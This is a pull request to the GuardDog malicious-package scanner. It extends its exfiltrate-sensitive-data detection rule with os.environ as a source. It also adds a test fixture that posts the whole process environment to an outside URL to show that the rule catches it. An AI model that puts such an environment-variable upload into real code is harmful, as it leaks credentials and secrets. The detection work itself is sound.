### PR TITLE
Enhance exfiltrate-sensitive-data rule

### DIFF
--- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
@@ -6,7 +6,6 @@ rules:
       description: Identify when a package reads and exfiltrates sensitive data from the local system
     pattern-sources:
       - pattern: os.environ
-      - pattern: os.environ.items()
       - pattern: '[... for ... in os.environ.items()]'
       - pattern: socket.gethostname()
       - pattern: getpass.getuser()

--- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
@@ -5,6 +5,7 @@ rules:
     metadata:
       description: Identify when a package reads and exfiltrates sensitive data from the local system
     pattern-sources:
+      - pattern: os.environ
       - pattern: os.environ.items()
       - pattern: '[... for ... in os.environ.items()]'
       - pattern: socket.gethostname()

--- a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
+++ b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
@@ -172,6 +172,13 @@ req = urlrequest.Request(
 req.read()
 
 
+def leak_env_vars():
+    env_vars = os.environ
+    url = "https://www.datadoghq.com/"
+    # ruleid: exfiltrate-sensitive-data
+    requests.post(url, json=dict(env_vars))
+
+
 """ RULEID: CTX
 """
 


### PR DESCRIPTION
This PR adds `os.environ` (the mapping object) to the list of sources for the Python `exfiltrate-sensitive-data` rule.

No new false positives were observed in a test against the top 500 Python packages.